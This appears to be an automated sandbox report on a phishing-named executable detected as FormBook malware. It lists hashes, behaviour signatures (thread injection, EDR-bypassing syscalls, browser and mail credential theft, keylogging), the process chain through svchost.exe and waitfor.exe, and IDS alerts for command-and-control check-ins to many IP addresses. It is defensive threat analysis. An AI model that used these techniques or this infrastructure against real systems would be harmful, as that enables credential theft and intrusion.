
Windows Analysis Report
Proforma invoice - Arancia NZ.exe

Overview

General Information

Sample name: Proforma invoice - Arancia NZ.exe
Analysis ID: 1566688
MD5: a4c3a56e6258ea94065bf7151009d43c
SHA1: c4d4d96374381d46051521ff82d3bf9bfb405c38
SHA256: 87e59a4758499e2544872d9ad64c561b1fc62290c4420fd9caca07f0e6e830aa
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Proforma invoice - Arancia NZ.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe" MD5: A4C3A56E6258EA94065BF7151009D43C)
    • svchost.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • nfGtWoQBhJSQ.exe (PID: 4580 cmdline: "C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 5272 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • nfGtWoQBhJSQ.exe (PID: 728 cmdline: "C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
--- | --- | --- | --- | ---
00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
--- | --- | --- | --- | ---
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine|base64offset|contains: {, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ParentImage: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe, ParentProcessId: 4952, ParentProcessName: Proforma invoice - Arancia NZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ProcessId: 6596, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", CommandLine|base64offset|contains: {, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ParentImage: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe, ParentProcessId: 4952, ParentProcessName: Proforma invoice - Arancia NZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe", ProcessId: 6596, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-12-02T15:23:39.782792+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 202.92.5.23 | 80 | TCP
2024-12-02T15:24:05.071840+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49809 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:20.056219+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49846 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:35.928548+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49883 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:50.989606+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49920 | 46.30.211.38 | 80 | TCP
2024-12-02T15:25:06.141856+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49955 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:22.080569+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49992 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:37.661755+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:53.002213+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 38.47.232.202 | 80 | TCP
2024-12-02T15:26:08.807723+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:24.548736+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:40.068178+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:55.202013+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50024 | 172.67.167.146 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-12-02T15:23:56.759707+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49790 | 13.248.169.48 | 80 | TCP
2024-12-02T15:23:59.548725+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49797 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:02.373348+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49804 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:11.910522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49825 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:14.605227+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49832 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:17.349205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49839 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:27.581133+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49863 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:30.299853+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49869 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:33.049846+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49875 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:42.989311+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49899 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:45.641832+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49905 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:48.362326+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49914 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:58.149770+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49936 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:00.822710+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:03.552588+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49948 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:14.002988+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49972 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:16.675008+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:19.331148+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:29.612576+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50001 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:32.284329+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50002 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:34.956723+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50003 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:44.862317+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50005 | 38.47.232.202 | 80 | TCP
2024-12-02T15:25:47.536739+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50006 | 38.47.232.202 | 80 | TCP
2024-12-02T15:25:50.206089+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50007 | 38.47.232.202 | 80 | TCP
2024-12-02T15:26:00.206507+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:03.231207+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50010 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:05.592145+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:16.533640+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:19.222695+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50014 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:21.883704+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:31.596620+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:34.268653+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:36.940519+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:47.190348+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 172.67.167.146 | 80 | TCP
2024-12-02T15:26:49.862196+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50022 | 172.67.167.146 | 80 | TCP
2024-12-02T15:26:52.524614+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50023 | 172.67.167.146 | 80 | TCP
2024-12-02T15:27:02.582526+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50025 | 74.48.143.82 | 80 | TCP


                AV Detection

Source: Proforma invoice - Arancia NZ.exe | ReversingLabs: Detection: 47%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Proforma invoice - Arancia NZ.exe | Joe Sandbox ML: detected
Source: Proforma invoice - Arancia NZ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2264065169.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000002.4468779110.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nfGtWoQBhJSQ.exe, 00000004.00000002.4468208625.000000000003E000.00000002.00000001.01000000.00000005.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371266085.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010896437.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011131820.0000000003590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2205330195.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2297091430.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203022832.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.0000000004A7E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2297008372.000000000457A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2307765954.000000000472C000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4469911093.00000000048E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4470341771.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000025EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596011160.000000003A8DC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_002B445A
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BC6D1 FindFirstFileW,FindClose,0_2_002BC6D1
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002BC75C
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BEF95
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002BF0F2
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BF3F3
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B37EF
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002B3B12
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002BBCBC

                Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49751 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49804 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49797 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49809 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49832 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49790 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49846 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49869 -> 202.79.161.151:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49863 -> 202.79.161.151:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49920 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49914 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49936 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49942 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49899 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49883 -> 202.79.161.151:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49948 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49875 -> 202.79.161.151:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.187.114:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 38.47.232.202:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.187.114:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 74.48.143.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.187.114:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.187.114:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 38.47.232.202:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49955 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 38.47.232.202:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 43.205.198.29:80
